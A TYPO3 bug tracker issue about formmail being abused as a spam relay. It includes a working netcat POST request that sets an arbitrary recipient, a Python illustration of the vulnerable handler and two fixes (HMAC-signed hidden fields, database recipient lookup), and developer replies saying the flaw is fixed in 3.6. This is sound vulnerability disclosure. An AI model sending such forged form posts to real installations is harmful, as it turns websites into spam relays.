Bug #14265: formmail can be abused to send spam
Status: closed
Description
Getting TYPO3 to send emails to arbitrary email addresses is as easy as typing in
---------------------------------------------
# The body below is 91 bytes; Content-Length must match it exactly, and an
# empty line must separate the headers from the body, or the server never
# processes the request.
netcat -w 1 localhost 80 <<EOF
POST /index.php HTTP/1.1
Host: localhost
Referer: http://localhost/
Cookie: fe_typo_user=1bedf7ad7f
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Connection: close

subject=&recipient=me%40privacy.net&locationData=13%3Att_content%3A14&name=&formtype_mail=1
EOF
---------------------------------------------
on the console. The recipient can be set completely arbitrarily!
[To reproduce, you have to replace "localhost" with an actual TYPO3 installation and get a cookie from the server.]
Insecure formmail installations are routinely exploited by spammers to send massive amounts of email.
I see two ways to fix this: Calculate a sha1 hash of all hidden fields in the form and a secret string and use this in another hidden form field. On return of the form, check the sha1 hash.
Or (even better): Don't put the recipient email address in the form but fetch it from the database.
(issue imported from #M278)
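The two fixes the reporter proposes, worked through as an added example that is not TYPO3's own code (TYPO3 is written in PHP; Python is used here only to keep the illustration short). The secret, the name of the extra hidden field (formtype_mail_hash) and the recipient table keyed by locationData are assumptions. The first fix uses HMAC-SHA1 rather than the plain sha1(fields + secret) the report sketches, because a keyed MAC is not open to length-extension; the spammer's POST body from the report is replayed against the vulnerable handler and both fixes.

```python
import hmac
import hashlib
from urllib.parse import parse_qs, urlencode

# Hypothetical per-installation secret. It must live in server-side
# configuration, never in the form itself.
SECRET = b"example-install-secret-do-not-reuse"

# Hidden fields whose integrity the signature protects, in a fixed order.
HIDDEN_FIELDS = ("recipient", "locationData")
HASH_FIELD = "formtype_mail_hash"  # hypothetical name for the extra hidden field

# Constructed stand-in for the tt_content table: content element -> recipient.
CONTENT_RECIPIENTS = {"13:tt_content:14": "webmaster@example.org"}

# The spammer's POST body quoted in the report (percent-encoded as sent).
SPAM_BODY = ("subject=&recipient=me%40privacy.net"
             "&locationData=13%3Att_content%3A14&name=&formtype_mail=1")


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def sign_hidden_fields(fields):
    """MAC over the hidden fields (the report's first fix). HMAC-SHA1 is used
    instead of sha1(fields + secret) so the tag cannot be length-extended;
    urlencode gives an unambiguous canonical form of the field values."""
    canonical = urlencode([(name, fields.get(name, "")) for name in HIDDEN_FIELDS])
    return hmac.new(SECRET, canonical.encode(), hashlib.sha1).hexdigest()


def render_form(recipient, location_data):
    """Hidden fields the server embeds when it renders the mail form."""
    fields = {"recipient": recipient, "locationData": location_data}
    fields[HASH_FIELD] = sign_hidden_fields(fields)
    return fields


def handle_vulnerable(body):
    """The behaviour the report describes: the client-supplied recipient is
    used as-is. Returns the address mail would go to."""
    post = parse_body(body)
    if post.get("formtype_mail") != "1":
        return None
    return post.get("recipient")


def handle_signed(body):
    """Fix 1: only send if the hidden fields verify against the signature."""
    post = parse_body(body)
    if post.get("formtype_mail") != "1":
        return None
    expected = sign_hidden_fields(post)
    supplied = post.get(HASH_FIELD, "")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return None  # tampered or missing signature: drop the submission
    return post.get("recipient")


def handle_db_lookup(body):
    """Fix 2 (the report's preferred one): the recipient never travels in the
    form; it is looked up from the content element named by locationData."""
    post = parse_body(body)
    if post.get("formtype_mail") != "1":
        return None
    return CONTENT_RECIPIENTS.get(post.get("locationData"))


def legitimate_body(recipient, location_data, **user_fields):
    """Body a browser would send after submitting a server-rendered form."""
    fields = dict(render_form(recipient, location_data))
    fields.update(user_fields, formtype_mail="1")
    return urlencode(fields)


if __name__ == "__main__":
    print("vulnerable:", handle_vulnerable(SPAM_BODY))   # me@privacy.net
    print("signed:    ", handle_signed(SPAM_BODY))       # None
    print("db lookup: ", handle_db_lookup(SPAM_BODY))    # webmaster@example.org
```

With the second fix the forged recipient field is simply ignored and mail goes to the address configured for content element 14; with the first, the forged body carries no valid signature and is dropped, while a body produced from the server-rendered form verifies, and editing its recipient afterwards breaks the signature.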
Updated by Ingmar Schlecht over 20 years ago
This issue has been spoken about in the dev list already.
Maybe Jan-Erik can give a comment on the current status of that.
Updated by Jan-Erik Revsbech over 20 years ago
This is well known, and has been fixed in version 3.6 exactly the way you mention, by calculating a hash of the recipient address.
I don't think that version 3.5.0 is being bugfixed anymore (please correct me if I'm wrong). At least I haven't seen any 3.5.1 patches...
I can see that it's a big problem, so if there is ever talk about releasing a 3.5.1 patch, I will implement the check in that patch.